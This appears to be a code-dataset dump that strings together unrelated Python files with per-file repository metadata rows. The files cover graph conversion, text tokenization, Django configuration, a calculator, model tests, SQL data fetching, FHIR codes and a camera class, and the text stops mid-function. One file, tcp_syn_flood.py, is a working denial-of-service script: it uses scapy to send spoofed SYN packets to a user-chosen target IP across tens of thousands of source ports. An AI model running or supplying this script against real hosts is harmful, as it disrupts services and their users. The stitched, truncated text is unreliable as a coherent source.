def to_levi(self, rel_order=None, shuffle=True):
dependencies = defaultdict(set)
name2instance = dict()
name2instance.update(self.name2concept)
for u, rs in self.edges.items():
for r, v in rs:
# u --r--> v
r = REL + r
r_name = f'rel_{len(name2instance)}'
name2instance[r_name] = r
dependencies[v].add(r_name)
dependencies[r_name].add(u)
gs = []
try:
for g in toposort(dependencies):
gs.append(g)
except CircularDependencyError:
pass
node_seq = []
for g in gs:
g = list(g)
if rel_order:
if shuffle:
if random.random() < 0.5:
g = sorted(g, key=lambda x: -rel_order(name2instance[x]) if (
name2instance[x].startswith('snt') or name2instance[x].startswith('op')) else -1)
else:
random.shuffle(g)
else:
g = sorted(g, key=lambda x: -rel_order(name2instance[x]))
node_seq += g
ind = dict(map(reversed, enumerate(node_seq)))
edge = []
for v, us in dependencies.items():
if v not in ind:
continue
for u in us:
if u not in ind:
continue
edge.append((ind[v], ind[u], ''))
return [name2instance[x] for x in node_seq], edge
| 38.934673 | 116 | 0.576278 | 5,800 | 0.74858 | 0 | 0 | 0 | 0 | 0 | 0 | 1,732 | 0.223542 |
636a9b71316125fb79b3ddc33da9e14bd47d75ca | 5,252 | py | Python | passage/preprocessing.py | vishalbelsare/Passage | af6e100804dfe332c88bd2cd192e93a807377887 | [
"MIT"
] | 597 | 2015-01-15T19:23:32.000Z | 2021-08-29T17:53:22.000Z | passage/preprocessing.py | v-mk-s/Passage | af6e100804dfe332c88bd2cd192e93a807377887 | [
"MIT"
] | 34 | 2015-01-22T13:50:21.000Z | 2018-06-13T14:58:45.000Z | passage/preprocessing.py | v-mk-s/Passage | af6e100804dfe332c88bd2cd192e93a807377887 | [
"MIT"
] | 152 | 2015-01-17T02:19:22.000Z | 2022-02-05T15:10:04.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import string
from collections import Counter
import numpy as np
import theano
import theano.tensor as T
punctuation = set(string.punctuation)
punctuation.add('\n')
punctuation.add('\t')
punctuation.add(u'’')
punctuation.add(u'‘')
punctuation.add(u'“')
punctuation.add(u'”')
punctuation.add(u'´')
punctuation.add('')
def one_hot(X, n=None, negative_class=0.):
X = np.asarray(X).flatten()
if n is None:
n = np.max(X) + 1
Xoh = np.ones((len(X), n)) * negative_class
Xoh[np.arange(len(X)), X] = 1.
return Xoh
def flatten(l):
return [item for sublist in l for item in sublist]
def lbf(l,b):
return [el for el, condition in zip(l, b) if condition]
def list_index(l, idxs):
return [l[idx] for idx in idxs]
def tokenize(text):
tokenized = []
w = ''
for t in text:
if t in punctuation:
tokenized.append(w)
tokenized.append(t)
w = ''
elif t == ' ':
tokenized.append(w)
w = ''
else:
w += t
if w != '':
tokenized.append(w)
tokenized = [token for token in tokenized if token]
return tokenized
def token_encoder(texts, max_features=9997, min_df=10):
df = {}
for text in texts:
tokens = set(text)
for token in tokens:
if token in df:
df[token] += 1
else:
df[token] = 1
k, v = df.keys(), np.asarray(df.values())
valid = v >= min_df
k = lbf(k, valid)
v = v[valid]
sort_mask = np.argsort(v)[::-1]
k = list_index(k, sort_mask)[:max_features]
v = v[sort_mask][:max_features]
xtoi = dict(zip(k, range(3, len(k)+3)))
return xtoi
def standardize_targets(Y, cost):
Y = np.asarray(Y)
ndim = len(Y.shape)
if ndim == 1:
Y = Y.reshape(-1, 1)
if Y.shape[1] == 1 and cost.__name__ == 'CategoricalCrossEntropy':
Y = one_hot(Y, negative_class=0.)
if Y.shape[1] == 1 and 'Hinge' in cost.__name__:
if len(np.unique(Y)) > 2:
Y = one_hot(Y, negative_class=-1.)
else:
Y[Y==0] -= 1
return Y
class Tokenizer(object):
"""
For converting lists of text into tokens used by Passage models.
max_features sets the maximum number of tokens (all others are mapped to UNK)
min_df sets the minimum number of documents a token must appear in to not get mapped to UNK
lowercase controls whether the text is lowercased or not
character sets whether the tokenizer works on a character or word level
Usage:
>>> from passage.preprocessing import Tokenizer
>>> example_text = ['This. is.', 'Example TEXT', 'is text']
>>> tokenizer = Tokenizer(min_df=1, lowercase=True, character=False)
>>> tokenized = tokenizer.fit_transform(example_text)
>>> tokenized
[[7, 5, 3, 5], [6, 4], [3, 4]]
>>> tokenizer.inverse_transform(tokenized)
['this . is .', 'example text', 'is text']
"""
def __init__(self, max_features=9997, min_df=10, lowercase=True, character=False):
self.max_features = max_features
self.min_df = min_df
self.lowercase = lowercase
self.character = character
def fit(self, texts):
if self.lowercase:
texts = [text.lower() for text in texts]
if self.character:
tokens = [list(text) for text in texts]
else:
tokens = [tokenize(text) for text in texts]
self.encoder = token_encoder(tokens, max_features=self.max_features-3, min_df=self.min_df)
self.encoder['PAD'] = 0
self.encoder['END'] = 1
self.encoder['UNK'] = 2
self.decoder = dict(zip(self.encoder.values(), self.encoder.keys()))
self.n_features = len(self.encoder)
return self
def transform(self, texts):
if self.lowercase:
texts = [text.lower() for text in texts]
if self.character:
texts = [list(text) for text in texts]
else:
texts = [tokenize(text) for text in texts]
tokens = [[self.encoder.get(token, 2) for token in text] for text in texts]
return tokens
def fit_transform(self, texts):
self.fit(texts)
tokens = self.transform(texts)
return tokens
def inverse_transform(self, codes):
if self.character:
joiner = ''
else:
joiner = ' '
return [joiner.join([self.decoder[token] for token in code]) for code in codes]
class LenFilter(object):
def __init__(self, max_len=1000, min_max_len=100, percentile=99):
self.max_len = max_len
self.percentile = percentile
self.min_max_len = min_max_len
def filter(self, *data):
lens = [len(seq) for seq in data[0]]
if self.percentile > 0:
max_len = np.percentile(lens, self.percentile)
max_len = np.clip(max_len, self.min_max_len, self.max_len)
else:
max_len = self.max_len
valid_idxs = [i for i, l in enumerate(lens) if l <= max_len]
if len(data) == 1:
return list_index(data[0], valid_idxs)
else:
return tuple([list_index(d, valid_idxs) for d in data])
| 30.894118 | 98 | 0.592917 | 3,074 | 0.5843 | 0 | 0 | 0 | 0 | 0 | 0 | 947 | 0.180004 |
636d48cb9b81c8aa18e1903f64ee3f997f6ae04e | 155 | py | Python | agendamentos/apps.py | afnmachado/univesp_pi_1 | e6f2b545faaf53d14d17f751d2fb32e6618885b7 | [
"MIT"
] | null | null | null | agendamentos/apps.py | afnmachado/univesp_pi_1 | e6f2b545faaf53d14d17f751d2fb32e6618885b7 | [
"MIT"
] | null | null | null | agendamentos/apps.py | afnmachado/univesp_pi_1 | e6f2b545faaf53d14d17f751d2fb32e6618885b7 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class AgendamentoConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'agendamentos'
| 22.142857 | 56 | 0.774194 | 118 | 0.76129 | 0 | 0 | 0 | 0 | 0 | 0 | 45 | 0.290323 |
636de814ecdedb3663dd101d8eaad27c3d18f26b | 3,443 | py | Python | app/mods/calculator.py | MzB-Teaching/calculator | 2de5f554a6cfb4a5f4047c7779b29808563d99bb | [
"Unlicense"
] | null | null | null | app/mods/calculator.py | MzB-Teaching/calculator | 2de5f554a6cfb4a5f4047c7779b29808563d99bb | [
"Unlicense"
] | null | null | null | app/mods/calculator.py | MzB-Teaching/calculator | 2de5f554a6cfb4a5f4047c7779b29808563d99bb | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
"""This is a simple python3 calculator for demonstration purposes
some to-do's but we'll get to that"""
__author__ = "Sebastian Meier zu Biesen"
__copyright__ = "2000-2019 by MzB Solutions"
__email__ = "smzb@mitos-kalandiel.me"
class Calculator(object):
@property
def isDebug(self):
return self._isDebug
@isDebug.setter
def isDebug(self, bDebug):
self._isDebug = bDebug
@isDebug.deleter
def isDebug(self):
del self._isDebug
@property
def isInteractive(self):
return self._isInteractive
@isInteractive.setter
def isInteractive(self, bInteractive):
self._isInteractive = bInteractive
@isInteractive.deleter
def isInteractive(self):
del self._isInteractive
@property
def Operation(self):
return self._Operation
@Operation.setter
def Operation(self, iOperation):
self._Operation = iOperation
@Operation.deleter
def Operation(self):
del self._Operation
@property
def Num1(self):
return self._Num1
@Num1.setter
def Num1(self, iNum):
if not isinstance(iNum, int):
raise TypeError
self._Num1 = iNum
@Num1.deleter
def Num1(self):
del self._Num1
@property
def Num2(self):
return self._Num2
@Num2.setter
def Num2(self, iNum):
if not isinstance(iNum, int):
raise TypeError
self._Num2 = iNum
@Num2.deleter
def Num2(self):
del self._Num2
def __init__(self):
self._isDebug = False
self._isInteractive = False
self._Operation = None
self._Num1 = None
self._Num2 = None
def add(self):
"""This functions adds two numbers"""
return self._Num1 + self._Num2
def subtract(self):
"""This is a simple subtraction function"""
return self._Num1 - self._Num2
def multiply(self):
"""Again a simple multiplication"""
return self._Num1 * self._Num2
def divide(self):
"""division function
todo: (smzb/js) make division by 0 impossible"""
return self._Num1 / self._Num2
def ask_op(self):
"""Lets ask what the user wants to do"""
print("Please select operation -\n"
"1. Add\n"
"2. Subtract\n"
"3. Multiply\n"
"4. Divide\n")
# Take input from the user
result = input("Select operations from 1, 2, 3, 4 :")
return int(result)
def ask_number(self):
"""Get a number from the user"""
num = int(input("Enter an operand: "))
return num
def eval_operation(self):
"""Now evaluate what operation the user wants,
and run the consecutive function"""
if self._Operation == 1:
print(self._Num1, "+", self._Num2, "=",
Calculator.add(self))
elif self._Operation == 2:
print(self._Num1, "-", self._Num2, "=",
Calculator.subtract(self))
elif self._Operation == 3:
print(self._Num1, "*", self._Num2, "=",
Calculator.multiply(self))
elif self._Operation == 4:
print(self._Num1, "/", self._Num2, "=",
Calculator.divide(self))
elif self._Operation == 0:
return
else:
print("Invalid operation")
| 24.949275 | 65 | 0.577984 | 3,188 | 0.925937 | 0 | 0 | 1,175 | 0.341272 | 0 | 0 | 767 | 0.222771 |
636ec0c0514935bf57f2ac6d68a3f04a9e9ec222 | 1,001 | py | Python | tcp_syn_flood.py | r3k4t/tcp_syn_flood | b0ccf8199ea9253ad882afb505071e9d01693be8 | [
"MIT"
] | null | null | null | tcp_syn_flood.py | r3k4t/tcp_syn_flood | b0ccf8199ea9253ad882afb505071e9d01693be8 | [
"MIT"
] | null | null | null | tcp_syn_flood.py | r3k4t/tcp_syn_flood | b0ccf8199ea9253ad882afb505071e9d01693be8 | [
"MIT"
] | 1 | 2021-08-08T09:07:31.000Z | 2021-08-08T09:07:31.000Z | import os
import sys
import time
import pyfiglet
from scapy.all import*
os.system("clear")
print (chr(27)+"[36m")
import pyfiglet
banner = pyfiglet.figlet_format("Tcp Syn Flood",font="slant")
print (banner)
print (chr(27)+"[33m")
print (" Author : Rahat Khan Tusar(RKT)")
print (" Github : https://github.com/r3k4t")
def synflood(src,tgt):
for sport in range(1024,65535):
T3=IP(src=src,dst=tgt)
T4=TCP(sport=sport,dport=1337)
pkt = T3/T4
send(pkt)
print (chr(27)+"[32m")
src = input("Enter your source ip:")
print (chr(27)+"[31m")
tgt = input("Enter your target ip:")
print (chr(27)+"[31m")
os.system("clear")
banner2 = pyfiglet.figlet_format("Attacking",font="standard")
print (banner2)
print (chr(27)+"[35m")
time.sleep(4)
print ("Loading =====================> 0 % ")
time.sleep(4)
print ("Loading ==============> 50 % ")
time.sleep(4)
print ("Loading ========> 100 % ")
print (chr(27)+"[32m")
synflood(src,tgt)
| 16.966102 | 61 | 0.597403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 335 | 0.334665 |
636ed44c67488a2bf87f694de36be6eb15ddd7e0 | 1,957 | py | Python | tests/test_models.py | lmacaya/oddt | bfbf9ea99768b556684dc99c6ac87a9f16b16f80 | [
"BSD-3-Clause"
] | 264 | 2015-02-20T11:11:51.000Z | 2022-03-28T06:44:00.000Z | tests/test_models.py | lmacaya/oddt | bfbf9ea99768b556684dc99c6ac87a9f16b16f80 | [
"BSD-3-Clause"
] | 106 | 2015-06-22T19:31:27.000Z | 2022-03-25T17:21:42.000Z | tests/test_models.py | lmacaya/oddt | bfbf9ea99768b556684dc99c6ac87a9f16b16f80 | [
"BSD-3-Clause"
] | 106 | 2015-06-23T22:10:55.000Z | 2022-01-21T05:02:32.000Z | import pickle
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_array_equal
import pytest
from oddt.scoring.models import classifiers, regressors
@pytest.mark.filterwarnings('ignore:Stochastic Optimizer')
@pytest.mark.parametrize('cls',
[classifiers.svm(probability=True),
classifiers.neuralnetwork(random_state=42)])
def test_classifiers(cls):
# toy data
X = np.concatenate((np.zeros((5, 2)), np.ones((5, 2))))
Y = np.concatenate((np.ones(5), np.zeros(5)))
np.random.seed(42)
cls.fit(X, Y)
assert_array_equal(cls.predict(X), Y)
assert cls.score(X, Y) == 1.0
prob = cls.predict_proba(X)
assert_array_almost_equal(prob, [[0, 1]] * 5 + [[1, 0]] * 5, decimal=1)
log_prob = cls.predict_log_proba(X)
assert_array_almost_equal(np.log(prob), log_prob)
pickled = pickle.dumps(cls)
reloaded = pickle.loads(pickled)
prob_reloaded = reloaded.predict_proba(X)
assert_array_almost_equal(prob, prob_reloaded)
@pytest.mark.parametrize('reg',
[regressors.svm(C=10),
regressors.randomforest(random_state=42),
regressors.neuralnetwork(solver='lbfgs',
random_state=42,
hidden_layer_sizes=(20, 20)),
regressors.mlr()])
def test_regressors(reg):
X = np.vstack((np.arange(30, 10, -2, dtype='float64'),
np.arange(100, 90, -1, dtype='float64'))).T
Y = np.arange(10, dtype='float64')
np.random.seed(42)
reg.fit(X, Y)
pred = reg.predict(X)
assert (np.abs(pred.flatten() - Y) < 1).all()
assert reg.score(X, Y) > 0.9
pickled = pickle.dumps(reg)
reloaded = pickle.loads(pickled)
pred_reloaded = reloaded.predict(X)
assert_array_almost_equal(pred, pred_reloaded)
| 31.564516 | 80 | 0.599898 | 0 | 0 | 0 | 0 | 1,774 | 0.90649 | 0 | 0 | 83 | 0.042412 |
636f4efb035fdaa64cb9b8922b6256a38b910e41 | 9,570 | py | Python | data/fech_data.py | wangjiehui11235/panther | cf1ca2f0c7107c5cdacf2f7ff4002d43427d9b07 | [
"Apache-2.0"
] | 3 | 2020-01-23T22:23:08.000Z | 2020-10-12T20:02:16.000Z | data/fech_data.py | wangjiehui11235/panther | cf1ca2f0c7107c5cdacf2f7ff4002d43427d9b07 | [
"Apache-2.0"
] | 1 | 2019-10-28T05:53:08.000Z | 2019-10-28T05:53:08.000Z | data/fech_data.py | wangjiehui11235/panther | cf1ca2f0c7107c5cdacf2f7ff4002d43427d9b07 | [
"Apache-2.0"
] | 9 | 2019-08-21T07:48:32.000Z | 2020-04-04T09:17:54.000Z | # -*- coding: utf-8 -*-
import pdb, six, importlib
import pandas as pd
from PyFin.api import makeSchedule, BizDayConventions
from sqlalchemy import create_engine, select, and_, or_
from utilities.singleton import Singleton
import sys
sys.path.append('..')
import config
# 连接句柄
@six.add_metaclass(Singleton)
class SQLEngine(object):
def __init__(self, url):
self._engine = create_engine(url)
def sql_engine(self):
return self._engine
class FetchEngine(object):
def __init__(self, name, url):
self._name = name
self._engine = SQLEngine(url)
@classmethod
def create_engine(cls, name):
if name == 'rl':
return FetchRLEngine
elif name == 'dx':
return FetchDXEngine
def base(self, table_name, begin_date, end_date, freq=None):
if freq is None:
query = select([table_name]).where(
and_(table_name.trade_date >= begin_date, table_name.trade_date <= end_date, ))
else:
rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
query = select([table_name]).where(table_name.trade_date.in_(rebalance_dates))
return pd.read_sql(query, self._engine.sql_engine())
class FetchRLEngine(FetchEngine):
def __init__(self):
self._db_url = '''mysql+mysqlconnector://{0}:{1}@{2}:{3}/{4}'''.format(config.rl_db_user,
config.rl_db_pwd,
config.rl_db_host,
config.rl_db_port,
config.rl_db_database)
super(FetchRLEngine, self).__init__('rl', self._db_url)
def market(self, begin_date, end_date, freq=None):
table = importlib.import_module('data.rl_model').Market
return self.base(table, begin_date, end_date, freq)
def market_code(self, sets, begin_date, end_date, freq=None):
table = importlib.import_module('data.rl_model').Market
if freq is None:
query = select([table]).where(
and_(table.trade_date >= begin_date, table.trade_date <= end_date,
table.security_code.in_(sets)))
else:
rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
query = select([table]).where(and_(table.trade_date.in_(rebalance_dates),
table.security_code.in_(sets)))
return pd.read_sql(query, self._engine.sql_engine()).drop(['id'], axis=1)
def index_market(self, benchmark, begin_date, end_date, freq=None):
table = importlib.import_module('data.rl_model').IndexMarket
if freq is None:
query = select([table]).where(
and_(table.trade_date >= begin_date, table.trade_date <= end_date,
table.security_code.in_(benchmark)))
else:
rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
query = select([table]).where(
and_(table.trade_date.in_(rebalance_dates), table.security_code.in_(benchmark)))
return pd.read_sql(query, self._engine.sql_engine()).drop(['id'], axis=1)
def exposure(self, begin_date, end_date, freq=None):
table = importlib.import_module('data.rl_model').Exposure
return self.base(table, begin_date, end_date, freq)
def index(self, benchmark, begin_date, end_date, freq=None):
table = importlib.import_module('data.rl_model').Index
if freq is None:
query = select([table]).where(
and_(table.trade_date >= begin_date, table.trade_date <= end_date,
table.isymbol.in_(benchmark)))
else:
rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
query = select([table]).where(and_(table.trade_date.in_(rebalance_dates),
table.isymbol.in_(benchmark)))
return pd.read_sql(query, self._engine.sql_engine()).drop(['id'], axis=1)
def industry(self, industry, begin_date, end_date, freq=None):
table = importlib.import_module('data.rl_model').Industry
if freq is None:
query = select([table.trade_date, table.isymbol,
table.symbol, table.iname]).where(
and_(table.trade_date >= begin_date, table.trade_date <= end_date,
table.isymbol.in_(industry)))
else:
rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
query = select([table.trade_date, table.isymbol,
table.symbol, table.iname]).where(and_(
table.trade_date.in_(rebalance_dates),
table.isymbol.in_(industry)))
return pd.read_sql(query, self._engine.sql_engine())
def security(self, symbol_sets):
table = importlib.import_module('data.rl_model').GLInternalCode
query = select([table.security_code, table.symbol]).where(
and_(table.symbol.in_(symbol_sets)))
return pd.read_sql(query, self._engine.sql_engine())
def factor(self, factor_category, begin_date, end_date, factor_name=None, freq=None):
if factor_name is None:
table = importlib.import_module('data.factor_model').__getattribute__(factor_category)
return self.base(table, begin_date, end_date, freq)
else:
table = importlib.import_module('data.factor_model').__getattribute__(factor_category)
key_sets = ['id', 'security_code', 'trade_date'] + factor_name
db_columns = []
for key in key_sets:
db_columns.append(table.__dict__[key])
if freq is None:
query = select(db_columns).where(
and_(table.trade_date >= begin_date, table.trade_date <= end_date, ))
else:
rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
query = select(db_columns).where(table.trade_date.in_(rebalance_dates))
return pd.read_sql(query, self._engine.sql_engine()).drop(['id'], axis=1)
class FetchDXEngine(FetchEngine):
def __init__(self):
super(FetchDXEngine, self).__init__('dx', 'postgresql+psycopg2://alpha:alpha@180.166.26.82:8889/alpha')
def market(self, begin_date, end_date, freq=None):
table = importlib.import_module('data.dx_model').Market
return self.base(table, begin_date, end_date, freq)
def exposure(self, begin_date, end_date, freq=None):
table = importlib.import_module('data.dx_model').Exposure
return self.base(table, begin_date, end_date, freq)
class EngineFactory():
def create_engine(self, engine_class):
return engine_class()
def result(self, begin_date, end_date):
raise NotImplementedError
class MarketFactory(EngineFactory):
def __init__(self, engine_class):
self._fetch_engine = self.create_engine(engine_class)
def result(self, begin_date, end_date, freq=None):
return self._fetch_engine.market(begin_date, end_date, freq)
def result_code(self, sets, begin_date, end_date, freq=None):
return self._fetch_engine.market_code(sets, begin_date, end_date, freq)
class ExposureFactory(EngineFactory):
def __init__(self, engine_class):
self._fetch_engine = self.create_engine(engine_class)
def result(self, begin_date, end_date, freq=None):
return self._fetch_engine.exposure(begin_date, end_date, freq)
class IndexFactory(EngineFactory):
def __init__(self, engine_class):
self._fetch_engine = self.create_engine(engine_class)
def result(self, benchmark, begin_date, end_date, freq=None):
return self._fetch_engine.index(benchmark, begin_date, end_date, freq)
class IndustryFactory(EngineFactory):
def __init__(self, engine_class):
self._fetch_engine = self.create_engine(engine_class)
def result(self, benchmark, begin_date, end_date, freq=None):
return self._fetch_engine.industry(benchmark, begin_date, end_date, freq)
class FactorFactory(EngineFactory):
def __init__(self, engine_class):
self._fetch_engine = self.create_engine(engine_class)
def result(self, factor_category, begin_date, end_date, factor_name=None, freq=None):
return self._fetch_engine.factor(factor_category, begin_date, end_date, factor_name, freq)
class SecurityFactory(EngineFactory):
def __init__(self, engine_class):
self._fetch_engine = self.create_engine(engine_class)
def result(self, symbol_sets):
return self._fetch_engine.security(symbol_sets)
class IndexMarketFactory(EngineFactory):
def __init__(self, engine_class):
self._fetch_engine = self.create_engine(engine_class)
def result(self, benchmark, begin_date, end_date, freq=None):
return self._fetch_engine.index_market(benchmark, begin_date, end_date, freq)
if __name__ == "__main__":
market_factory = ExposureFactory(FetchDXEngine)
begin_date = '2018-12-01'
end_date = '2018-12-31'
print(market_factory.result(begin_date, end_date))
| 42.914798 | 116 | 0.646186 | 9,032 | 0.942994 | 0 | 0 | 344 | 0.035916 | 0 | 0 | 485 | 0.050637 |
636fae94296d077704f838d5bc8a253de68b535f | 549 | py | Python | models/collaborator.py | phil-lopreiato/frc-notebook-server | 35e79dbcca45f0257a138ca2834b0b6e57b814f1 | [
"MIT"
] | null | null | null | models/collaborator.py | phil-lopreiato/frc-notebook-server | 35e79dbcca45f0257a138ca2834b0b6e57b814f1 | [
"MIT"
] | null | null | null | models/collaborator.py | phil-lopreiato/frc-notebook-server | 35e79dbcca45f0257a138ca2834b0b6e57b814f1 | [
"MIT"
] | null | null | null | from google.appengine.ext import ndb
class Collaborator(ndb.Model):
"""
Represents collab relationship at events
Notifications will only be sent if both the
sender and receiver have shared with each other
"""
srcUserId = ndb.StringProperty(required=True)
dstUserId = ndb.StringProperty(required=True)
mutual = ndb.BooleanProperty(default=False)
eventKey = ndb.StringProperty(required=True)
created = ndb.DateTimeProperty(auto_now_add=True)
updated = ndb.DateTimeProperty(auto_now=True, indexed=False)
| 30.5 | 64 | 0.744991 | 509 | 0.92714 | 0 | 0 | 0 | 0 | 0 | 0 | 156 | 0.284153 |
6371f69bd422691fe8339fc5e5157ce5b0079115 | 327 | py | Python | genomics_geek/graphql/mixins.py | genomics-geek/genomics-geek.com | ba24be4a0e3d569859a5378d4e7054d58c88728e | [
"MIT"
] | null | null | null | genomics_geek/graphql/mixins.py | genomics-geek/genomics-geek.com | ba24be4a0e3d569859a5378d4e7054d58c88728e | [
"MIT"
] | 2 | 2018-10-15T20:37:03.000Z | 2018-10-15T20:37:21.000Z | earsie_eats_blog/graphql/mixins.py | genomics-geek/earsie-eats.com | b2d1e6626daa44b5e03198bdc9362758803fd3ee | [
"MIT"
] | 1 | 2019-05-16T03:54:21.000Z | 2019-05-16T03:54:21.000Z | from graphene import Int
from .decorators import require_authenication
class PrimaryKeyMixin(object):
pk = Int(source='pk')
class LoginRequiredMixin(object):
@classmethod
@require_authenication(info_position=1)
def get_node(cls, info, id):
return super(LoginRequiredMixin, cls).get_node(info, id)
| 20.4375 | 64 | 0.740061 | 249 | 0.761468 | 0 | 0 | 154 | 0.470948 | 0 | 0 | 4 | 0.012232 |
637274d6c48599470c2d5a70eb69d9b7d03629a5 | 1,237 | py | Python | oops_fhir/r4/code_system/flag_priority_codes.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | oops_fhir/r4/code_system/flag_priority_codes.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | oops_fhir/r4/code_system/flag_priority_codes.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | from pathlib import Path
from fhir.resources.codesystem import CodeSystem
from oops_fhir.utils import CodeSystemConcept
__all__ = ["FlagPriorityCodes"]
_resource = CodeSystem.parse_file(Path(__file__).with_suffix(".json"))
class FlagPriorityCodes:
"""
Flag Priority Codes
This value set is provided as an exemplar. The value set is driven by
IHE Table B.8-4: Abnormal Flags, Alert Priority.
Status: draft - Version: 4.0.1
Copyright None
http://hl7.org/fhir/flag-priority-code
"""
pn = CodeSystemConcept(
{"code": "PN", "definition": "No alarm.", "display": "No alarm"}
)
"""
No alarm
No alarm.
"""
pl = CodeSystemConcept(
{"code": "PL", "definition": "Low priority.", "display": "Low priority"}
)
"""
Low priority
Low priority.
"""
pm = CodeSystemConcept(
{"code": "PM", "definition": "Medium priority.", "display": "Medium priority"}
)
"""
Medium priority
Medium priority.
"""
ph = CodeSystemConcept(
{"code": "PH", "definition": "High priority.", "display": "High priority"}
)
"""
High priority
High priority.
"""
class Meta:
resource = _resource
| 19.030769 | 86 | 0.606306 | 1,006 | 0.813258 | 0 | 0 | 0 | 0 | 0 | 0 | 713 | 0.576395 |
63740319cbdd9993b7493ee891f9371a9c6e02c1 | 256 | py | Python | components/collector/src/source_collectors/sonarqube/duplicated_lines.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 33 | 2016-01-20T07:35:48.000Z | 2022-03-14T09:20:51.000Z | components/collector/src/source_collectors/sonarqube/duplicated_lines.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 2,410 | 2016-01-22T18:13:01.000Z | 2022-03-31T16:57:34.000Z | components/collector/src/source_collectors/sonarqube/duplicated_lines.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 21 | 2016-01-16T11:49:23.000Z | 2022-01-14T21:53:22.000Z | """SonarQube duplicated lines collector."""
from .base import SonarQubeMetricsBaseClass
class SonarQubeDuplicatedLines(SonarQubeMetricsBaseClass):
"""SonarQube duplicated lines collector."""
valueKey = "duplicated_lines"
totalKey = "lines"
| 23.272727 | 58 | 0.765625 | 164 | 0.640625 | 0 | 0 | 0 | 0 | 0 | 0 | 111 | 0.433594 |
63763ebb1e4d5814f4a75ddf0793dd74b59fa669 | 370 | py | Python | myapp/migrations/0002_studentmodel_dob.py | RajapandiR/Student | b0da4a04394381fda52f75234f6347c43958454a | [
"MIT"
] | null | null | null | myapp/migrations/0002_studentmodel_dob.py | RajapandiR/Student | b0da4a04394381fda52f75234f6347c43958454a | [
"MIT"
] | null | null | null | myapp/migrations/0002_studentmodel_dob.py | RajapandiR/Student | b0da4a04394381fda52f75234f6347c43958454a | [
"MIT"
] | null | null | null | # Generated by Django 3.2.9 on 2021-11-23 16:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myapp', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='studentmodel',
name='DOB',
field=models.DateField(null=True),
),
]
| 19.473684 | 47 | 0.581081 | 277 | 0.748649 | 0 | 0 | 0 | 0 | 0 | 0 | 87 | 0.235135 |
63783927c365abff6927c69ef8abf31d89e8cbab | 6,159 | py | Python | sl_cutscenes/camera.py | AIS-Bonn/sl-cutscenes | d50128b86a9c808cbe5943e737a4974f0a8d3982 | [
"MIT"
] | 2 | 2022-03-25T08:24:10.000Z | 2022-03-29T09:06:47.000Z | sl_cutscenes/camera.py | AIS-Bonn/sl-scenes | d50128b86a9c808cbe5943e737a4974f0a8d3982 | [
"MIT"
] | null | null | null | sl_cutscenes/camera.py | AIS-Bonn/sl-scenes | d50128b86a9c808cbe5943e737a4974f0a8d3982 | [
"MIT"
] | null | null | null | import numpy as np
import torch
from typing import List
from sl_cutscenes.constants import SCENARIO_DEFAULTS
from sl_cutscenes.utils.camera_utils import ConstFunc, LinFunc, LinFuncOnce, SinFunc, TanhFunc
camera_movement_constraints = SCENARIO_DEFAULTS["camera_movement"]
class Camera(object):
'''
The camera object provides a range of functionalities to better model real-world (stereo) cameras
that might move around or behave otherwise as time passes.
'''
def __init__(self, name: str, cam_dt: float, elev_angle: float, ori_angle: float, distance: float,
lookat: torch.Tensor, stereo_pair_dist: float, stereo_positions: List[str], movement_complexity: int):
self.name = name # can be used e.g. to name the corresponding output directories
self.cam_dt = cam_dt
self.movement_complexity = movement_complexity
self.moving = self.movement_complexity > 0
self.stereo_pair_dist = stereo_pair_dist
self.stereo_positions = stereo_positions
self.start_elev_angle = elev_angle
self.start_ori_angle = ori_angle
self.start_distance = distance
self.start_base_lookat = lookat
self.start_up_vec = torch.tensor([0.0, 0.0, 1.0]) # TODO adjustable up vector instead of [0, 0, 1]
self.reset_cam()
self.setup_cam_pos_func()
def reset_cam(self):
self.t = 0.0 # in seconds
self.base_lookat = self.start_base_lookat
def setup_cam_pos_func(self):
# for each attribute that can be animated, generate a probability number.
# Keep the <self.movement_complexity> highest ones.
if self.moving:
probs_for_movement = np.random.uniform(size=3)
# the following line doesn't work for N=0. Therefore, the if-statement has to be used.
probs_for_movement[probs_for_movement.argsort()[:-1 * self.movement_complexity]] = 0
else:
probs_for_movement = np.zeros(shape=(3,))
prob_elev, prob_ori, prob_dist = probs_for_movement
# Use previously generated random numbers to decide whether a
# Non-constant movement function will be used for that specific parameter.
# - movement function for elevation angle attribute
if np.random.uniform() >= prob_elev:
self.elev_angle_func = ConstFunc(self.start_elev_angle, None, None, None)
else:
start_val = self.start_elev_angle
end_val = self.cmc_random_uniform("delta_elev") + start_val
start_t = self.cmc_random_uniform("t_start")
end_t = self.cmc_random_uniform("t_duration") + start_t
elev_func = np.random.choice([SinFunc, LinFuncOnce, TanhFunc])
self.elev_angle_func = elev_func(start_val, end_val, start_t, end_t)
# - movement function for orientation angle attribute
if np.random.uniform() >= prob_ori:
self.ori_angle_func = ConstFunc(self.start_ori_angle, None, None, None)
else:
start_val = self.start_ori_angle
end_val = self.cmc_random_uniform("delta_ori") + start_val
start_t = self.cmc_random_uniform("t_start")
